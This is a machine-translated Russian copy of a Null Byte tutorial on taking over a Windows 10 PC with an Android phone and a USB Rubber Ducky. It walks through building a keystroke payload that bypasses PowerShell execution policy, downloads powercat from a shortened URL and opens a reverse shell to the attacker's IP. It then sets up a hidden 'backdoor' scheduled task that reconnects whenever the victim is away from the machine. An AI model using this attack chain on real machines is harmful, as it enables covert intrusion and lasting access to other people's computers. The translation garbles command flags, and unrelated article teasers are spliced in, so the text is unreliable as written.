Android для хакеров Как взломать Windows 10 с помощью телефона Android — USB Rubber Ducky — Null Byte

С незаметным телефоном Android и USB-флешкой злоумышленник может взломать компьютер с Windows 10 менее чем за 15 секунд. После того, как корневая оболочка установлена, долговременное сохранение в бэкдоре может быть настроено всего двумя простыми командами. в обход антивирусного программного обеспечения и Защитника Windows.

Как работает эта атака

Powercat. это полнофункциональный модуль PowerShell. Он работает так же, как Netcat, и позволяет пользователям PowerShell создавать туннели TCP и UDP с простыми аргументами командной строки. Будет создана полезная нагрузка PowerShell для загрузки, импорта и выполнения Powercat с помощью одной команды. Затем он будет закодирован в двоичный формат, понятный USB Rubber Ducky.

Используя USB Rubber Ducky, Powercat выполняется в Windows 10 как администратор, который быстро устанавливает корневую оболочку через прослушиватель Netcat атакующего. На этом этапе постоянство настраивается с помощью Schtasks Команда, которая была разработана Microsoft для автоматизации задач и команд в Windows 10.

Предпосылки

Для этого взлома требуется немного оборудования, которое некоторые из вас уже могут использовать. Ниже приведены четыре ключевых пункта.

1. USB резиновая уточка

USB Rubber Ducky идентифицирует себя как клавиатуру при подключении к компьютеру, а затем автоматически вводит вредоносные команды, предварительно запрограммированные в его полезную нагрузку. Полезная нагрузка может быть настроена для выполнения множества передовых эксплойтов. Цены на USB Rubber Ducky от Hak5 начинаются от 45 долларов.

Купить USB резиновая уточка от Amazon | Hak5

В качестве альтернативы USB Rubber Ducky проекты NetHunter и DroidDucky могут превратить устройства Android в инструменты инъекции клавиш. Они требуют модификации операционной системы Android, которая, к сожалению, выходит за рамки этой статьи. И NetHunter, и DroidDucky. фантастические проекты для тех, кто хочет изменить операционную систему своего телефона. Представьте себе, что вы подключаете телефон Android к любому компьютеру и выполняете сложные загрузки PowerShell за считанные секунды. USB Rubber Ducky не требуется.

2. Android-устройство с UserL и установленным

Подойдет любой телефон или планшет на Android с поддержкой приложения UserLAnd. Устройство не нуждается в руте. Все, что требуется. это доступ к Интернету через Wi-Fi и вышеупомянутое приложение UserLAnd.

3. Адаптер OTG (Условно)

После создания полезной нагрузки PowerShell (на более позднем этапе) ее необходимо будет перенести на карту microSD в UBS Rubber Ducky. Некоторые модели телефонов и планшетов на базе Android оснащены слотом расширения microSD для большего объема памяти, поэтому, если у вас есть один из них, вам будет удобно, поскольку вы можете передавать файл таким способом.

Поскольку USB Rubber Ducky поставляется с адаптером microSD-USB, вы можете выбрать адаптер OTG с гнездом USB типа A для подключения адаптера microSD. Если у вас есть порт USB-C на вашем устройстве Android, Aukey станет хорошим адаптером. Для портов Micro-USB доступно множество дешевых опций, таких как кабель Ugreen.

Android для хакеров Как взломать Windows 10 с помощью телефона Android - USB Rubber Ducky - Null Byte

Кроме того, любая комбинация адаптеров может сделать работу. Как вы можете видеть ниже, я использую адаптер Aukey в сочетании с портативным кард-ридером Anker.

Android для хакеров Как взломать Windows 10 с помощью телефона Android - USB Rubber Ducky - Null Byte

4. Виртуальный частный сервер (необязательно)

Требуется ли виртуальный частный сервер (VPS), зависит от сценария атаки. Если сеть Wi-Fi используется совместно с целевым устройством, то встраивание локального IP-адреса злоумышленника в полезную нагрузку будет работать нормально. В других случаях может потребоваться развернуть сервер VPS или Ngrok.

Шаг 1: Начало работы с UserLAnd

Прежде чем идти вперед, вам следует ознакомиться с руководством Distortion по превращению телефона Android во взломанное устройство без рута, а также с моим руководством по взлому паролей WPA2 Wi-Fi с помощью Android, так как они охватывают основы UserLAnd и настройку Kali Linux, Ngrok и установка необходимого программного обеспечения, необходимого для выполнения этой статьи.

Вам нужно будет установить и настроить UserLAnd, создать новую файловую систему и подключиться к ОС через SSH через ConnectBot (или JuiceSSH или встроенный SSH-клиент).

Шаг 2: Обновите систему Установите необходимое программное обеспечение

Как и для любого устройства на основе Unix, перед продолжением работы с проектами рекомендуется убедиться, что установленные пакеты полностью обновлены. Обязательно обновите систему и установите необходимое программное обеспечение, а также установите Java, которая необходима для полезной нагрузки USB Rubber Ducky, с помощью приведенных ниже команд.

Выполнение этой команды может занять несколько минут в зависимости от доступной скорости интернета и процессора Android. Старые устройства Android загружают и распаковывают пакеты дольше.

Чтобы установить необходимое программное обеспечение, используйте команду ниже.

Читайте так же

Windows 10 BOOST — ваш ПК только что получил... WINDOWS 10 только что получил обновление, которое делает ваш компьютер еще лучше, и здесь есть все новое. Windows 10. это компьютерная операционная система Microsoft, которая в этом месяце готовится к огромному обновлению (Изображение: Microsoft) W...
Samsung Galaxy A50, Galaxy A30, Galaxy A10 с Andro... Samsung Galaxy A50 и Galaxy A30 поступят в продажу со 2 марта, Galaxy A10. с 20 марта Особенности Samsung Galaxy A50, Galaxy A30 и Galaxy A10 официально запущены в Индии. Новые модели Galaxy A-серии оснащены дисплеями Super AMOLED, а также нескольк...
Москва и Лондон похожи — кто кого копирует?... После посещения Лондона у меня возникло ощущение, что власти России в течении столетий копировали Лондон! Оба города стоят на берегах рек приблизительно одной ширины. Но в Лондоне здание парламента стоит на внутренней стороне изгиба реки, что удоб...

Java необходима для компиляции полезных нагрузок Ducky. Чтобы установить его, используйте команду ниже.

Наконец, перезагрузите устройство Android, чтобы все обновления пакета и ядра вступили в силу при следующей загрузке Android в ОС UserLAnd Kali.

Шаг 3: Запустите прослушиватель Netcat

В зависимости от сценария атаки существует несколько способов настроить прослушиватель Netcat, который позволит удаленный доступ к целевому компьютеру Windows.

  • Локальный IP-адрес. Если целевой компьютер находится в той же сети Wi-Fi, что и устройство Android, можно будет просто запустить прослушиватель Netcat в ОС UserLAnd Kali. Хотя этот метод частный и быстрый, он не идеален. Если и когда цель отключится от общей сети Wi-Fi, соединение Netcat будет разорвано, и не будет никакого доступа к устройству при его перемещении между различными сетями.
  • Виртуальный частный сервер. VPS идеально подходят для удаленного взлома целей, поскольку они перемещаются между различными сетями Wi-Fi в любой точке мира. В этом случае злоумышленник приобретет дешевые VPS и SSH в. Netcat и Screen будут установлены для длительного хранения на взломанном компьютере Windows. Это можно настроить полностью с Android.
  • Ngrok. Настройка удаленного доступа с помощью Ngrok в некоторой степени описана в разделе «Взлом паролей Wi-Fi WPA2 с помощью Android». В этом случае Ngrok будет пересылать запросы обратно на Android-устройство злоумышленника. Бесплатные учетные записи Ngrok не позволяют пользователям перерабатывать субдомены, поэтому это может обеспечить сохранение до тех пор, пока сервер Ngrok не будет завершен на устройстве Android. Несмотря на то, что в Android можно поддерживать работоспособность сервера в течение длительного периода времени, он неизбежно в конечном итоге завершает работу, когда Android перезагружается или молча закрывает приложение UserLAnd, работающее в фоновом режиме.

В любом случае, неплохо настроить Screen так, чтобы сеансы терминала продолжались, несмотря на закрытие соединений SSH. Экран позволяет пользователям управлять несколькими сеансами терминала в одной консоли. Читателям рекомендуется научиться использовать Screen, поскольку он позволяет легко перемещаться и «отключать» несколько терминальных сеансов без потери данных.

Чтобы начать новый сеанс экрана, просто введите экран.

Затем используйте ifconfig.a Команда для определения локального IP-адреса, используемого системой. Этот IP потребуется на следующем шаге при создании полезной нагрузки.

В ОС UserLAnd Kali будет много доступных интерфейсов. Интерфейс "wlan0" или "wlan1", скорее всего, будет содержать локальный IP-адрес устройства (192.168.0.208). Пользователи VPS вместо этого будут вставлять тот же внешний IP-адрес, который используется при SSHing на сервер. Пользователи Ngrok должны будут настроить сервер и встроить URL в полезную нагрузку.

Наконец, запустите прослушиватель Netcat с помощью приведенной ниже команды.

Используя порт (-п) 1234, Netcat будет слушать (-L) на каждом доступном интерфейсе. -ст (подробный) напечатает IP-адрес цели в терминале, когда будет установлено новое соединение.

Шаг 4: Создайте полезную нагрузку

После перезагрузки Android запустите приложение UserLAnd и SSH в новой системе Kali. использование нано создать новый файл "payload.txt" в доме (

/) каталог. Этот файл будет содержать полезную нагрузку Ducky в виде простого текста.

Комментарии (REM) были добавлены, чтобы объяснить, что делает каждая строка полезной нагрузки.

В PowerShell с одним вкладышем происходит много всего. Есть несколько команд, связанных и разделенных точками с запятой.

  • А = ENV: TEMP. Временный каталог цели устанавливается в переменную a. Эта переменная вызывается дважды в скрипте. Во-первых, выступая в качестве выходного каталога для powercat.ps1 и снова вызывается при его импорте. Использование одной буквы переменная помогает сократить общую длину полезной нагрузки; Это более эффективно, чем использовать «C: \ Users \% USERNAME% \ AppData \ Local \ Temp» несколько раз в полезной нагрузке.
  • Set-ExecutionPolicy Bypass. Set-ExecutionPolicy. это функция безопасности PowerShell, которая предотвращает выполнение многих подобных полезных нагрузок PowerShell. В нескольких тестах я обнаружил, что простой установки.ExecutionPolicy недостаточно для обхода этой функции безопасности. В качестве администратора (root) эту политику можно обойти.
  • wget https://cutt.ly/cW13i.o a \ d.ps1. PowerShell получил указание вызвать веб-запрос (Wget) и загрузите файл powercat.ps1 с сокращенным URL-адресом cutt.ly. Этот URL-адрес напрямую связан со страницей Powercat GitHub, но его можно изменить на полный URL-адрес или другой сокращенный URL-адрес. Powercat.ps1 сохраняется () во временный каталог ( а) с именем файла "d.ps1". Имя файла было сокращено до одной буквы, чтобы сделать полезную нагрузку Ducky максимально короткой.
  • ipmo a \ d.ps1. Функция импорта-модуля PowerShell вызывается с использованием псевдонима ipmo. Снова, используя более короткую версию команды, чтобы сохранить полезную нагрузку Ducky короткой. Powercat.ps1 импортируется.
  • powercat.c 192.168.0.208.p 1234.e powershell. наконец, Powercat выполняется и инструктируется для подключения () на сервер злоумышленника (192.168.0.208) в порту (-п) 1234 и выполнить () PowerShell, когда соединение установлено. Это эффективно предоставляет злоумышленнику удаленный доступ к корневому терминалу PowerShell.

Комментарии REM могут оставаться в полезной нагрузке и не будут влиять на нажатия клавиш. Чтобы сохранить и выйти из нано терминала, нажмите Ctrl-х, затем Y, затем Войти.

Шаг 5: кодировать полезную нагрузку

USB Rubber Ducky не может быть загружен на карту microSD в виде обычного текста. Вместо этого, Hak5 Duck Encoder будет использоваться для преобразования простого текста в двоичный формат.

Чтобы клонировать репозиторий Duck Encoder, используйте команду ниже.

Изменить (CD) в только что созданный каталог Encoder /.

И закодируйте payload.txt с помощью команды ниже. Эта команда будет использовать encoder.jar для преобразования ввода () файл в нужный вывод «inject.bin» (бинарный Имя выходного файла не является произвольным и должно называться «inject.bin», чтобы Ducky мог выполнять атаки с помощью нажатия клавиш.

Когда это будет сделано, в каталоге Encoder / появится новый файл «inject.bin». Это можно проверить, используя ниже ls.l команда.

Шаг 6: Подключите Ducky MicroSD к устройству Android

С помощью адаптера устройства чтения карт памяти, внутреннего гнезда для карты microSD или адаптера OTG с устройством чтения карт памяти вставьте карту памяти Ducky microSD в устройство Android. Содержимое файла microSD можно просмотреть с помощью приложения Android для загрузки.

Android для хакеров Как взломать Windows 10 с помощью телефона Android - USB Rubber Ducky - Null Byte

Через несколько секунд новое съемное устройство будет доступно через приложение «Загрузка» (пример). Вернитесь к терминалу OS Kali. Операционная система Kali не будет иметь доступа к внешним устройствам хранения (например, к карте microSD), поэтому сначала необходимо скопировать «inject.bin» (ср) в каталог / sdcard / Download /, затем скопируйте его на microSD с помощью ОС Android.

И вот оно, теперь доступно в приложении Скачать.

Читайте так же

Тенденции мелкой бытовой техники 2019 года Яркие ц... В этом году больше мелкой бытовой техники получит захватывающую отделку и привлекательные цвета. Мы получили предварительный просмотр на IIHS в Чикаго. Наступил 2019 год, и пришло время подумать не только о кухонных приборах из нержавеющей стали. В ...
Итальянское мороженое 3 шарика... Классическое итальянское мороженое Gelato Предлагаем Вам войти в федеральную сеть джелатерий «3 Шарика». На основании многолетнего опыта компании Юниджел (производитель мороженого премиум-класса) и опыта ее розничных партнеров мы разработали новую к...
Можно Ли Подключить Hdmi К Монитору... Для визуализации инфы, которая обрабатывается компом, обязательно нужен экран. С технической стороны подключение монитора к системному блоку обеспечивается посредством кабеля. Разъемы для кабелей случаются 4 типов: HDMI, DisplayPort, DVI по другому V...

Android для хакеров Как взломать Windows 10 с помощью телефона Android - USB Rubber Ducky - Null Byte
Android для хакеров Как взломать Windows 10 с помощью телефона Android - USB Rubber Ducky - Null Byte

Выделите «inject.bin» и нажмите кнопку «Копировать в». Затем скопируйте его на карту microSD и безопасно извлеките microSD из устройства Android.

Шаг 7: пусть взлом начнется

Вставьте USB Rubber Ducky в целевой компьютер с Windows 10, и новое соединение с устройством Android будет установлено.

Netcat сообщит о новом «Соединении с xx.xx.xx.xx», содержащем IP-адрес получателя. Запуск команды как Ls или же PWD выведет список файлов в текущем каталоге или напечатает имя текущего каталога, соответственно. Pwnage может начаться.

Шаг 8: установить постоянство (необязательно)

Первое, что нужно сделать после установки обратной оболочки. настроить постоянство в случае потери текущего соединения. Это необязательный шаг, но рекомендуется там, где требуется длительная эксплуатация. В Windows 10 существует довольно много способов установить постоянство. Ниже приведен один из вариантов.

Чтобы начать, Schtasks Команда может быть использована для планирования задач для автоматического выполнения Windows 10. Например, можно было бы подключить Windows 10 к серверу злоумышленника каждый раз Икс минут. Икс быть произвольным количеством времени, например 10 минут или 120 минут.

Чтобы обойти цель, увидев всплывающее окно с неизменной долей секунды, созданное PowerShell, Schtasks имеет полезную функциональность для запуска команд только если компьютер простаивает. Таким образом, если экран перешел в спящий режим или запущена заставка, только тогда он попытается подключиться к серверу злоумышленника. Это идеально для запуска всплывающего окна терминала, только когда владелец ПК находится вне устройства.

Schtasks команда имеет

Не более 175 символов, что может усложнить выполнение длинных команд. Чтобы быстро обойти это, сначала создайте «backdoor.ps1», содержащий команды загрузки, импорта и выполнения Powercat.

Каталог Windows \ используется для хранения backdoor.ps1, но это местоположение не является обязательным. Каталог и имя файла могут быть изменены, чтобы лучше замаскировать местоположение скрипта и не дать цели наткнуться на него. Аналогично, номер порта (-р 2) можно изменить на другой порт.

Затем используйте Schtasks выполнить «backdoor.ps1», когда компьютер становится бездействующим.

Task Scheduler (schtasks) создаст задачу с именем (/ т) "черный ход." Задача запустить (/ тр) выполнит скрипт backdoor.ps1. Частота (/ SC), при котором команда запускается, устанавливается на «onidle», что указывает компьютеру запускать команду только тогда, когда устройство находится в режиме ожидания. Наконец, количество времени (в минутах) определяется аргумент и установить в 1 минута.

Короче одна минута после цель удаляется от компьютера, она попытается выполнить backdoor.ps1, встроенный в каталог Microsoft \. Помните, что когда цель вернется, соединение будет автоматически прервано Windows 10. Соединение будет сохраняться, только если цель находится вне компьютера. Просто перезапустите сервер Netcat и подождите, пока компьютер снова не будет работать; новое соединение будет пытаться каждый раз.

Теперь, используя другой сеанс Screen, создайте новый прослушиватель Netcat и подождите, пока компьютер с Windows не станет свободным.

Там много веселья, чтобы иметь со Schtasks. Для получения дополнительной информации о доступных аргументах используйте schtasks /? а также schtasks / Создать /? Команда, как показано ниже.

Больше Android Взломать PowerShell

С помощью Android и небольшого USB-устройства злоумышленник может нанести ущерб сети компьютера с Windows. Для выполнения полезной нагрузки требуется всего 15 секунд физического доступа, поэтому можно создать административную оболочку, позволяющую злоумышленнику встроить в устройство долговременное постоянство.

Android с UserLAnd прекрасно работает как хакерское устройство. Однако есть некоторые ограничения. Процессор не совсем то, что нужно для запуска полных фреймворков, таких как Metasploit, Empire и Wine. В будущих статьях мы будем веселиться с продвинутыми атаками после эксплуатации, такими как захват клавиш и запись звука через микрофон, используя только Android и PowerShell.

  • Следите за нулевым байтом в Твиттере, Флипборде и YouTube
  • Подпишитесь на еженедельную рассылку Null Byte
  • Следуйте WonderHowTo на Facebook, Twitter, Pinterest и Flipboard

Фото на обложке и скриншоты от Tokyoneon / Null Byte

Читайте так же

В разработке программного обеспечения эмпатия стан... На саммите Cloud Foundry Дениз Ю объясняет, почему дизайн, ориентированный на человека, должен стать ключевым для программных проектов. Джо МакКендрик для Сервис Ориентирован | 3 апреля 2019. 15:59 GMT (08:59 PDT) | Тема: Разработчик В разработке ...
ТОП-5 бизнес-идей актуальных в этом году... Для открытия собственного дела требуется быть не только начитанным и образованным человеком в сфере экономики, но необходимо следить за состоянием бизнеса, быстро схватывать новые идеи. Обычно успешным бизнесменом становится тот, кто вовремя угадал к...
Как отключить значки значков приложений — не... Панель уведомлений вашего S10 может быстро заполняться уведомлениями о входящих сообщениях, электронных письмах, сводках погоды. У этого списка нет конца. Если этого недостаточно, эти уведомления сопровождаются значками, которые появляются в виде мал...

Author: dakus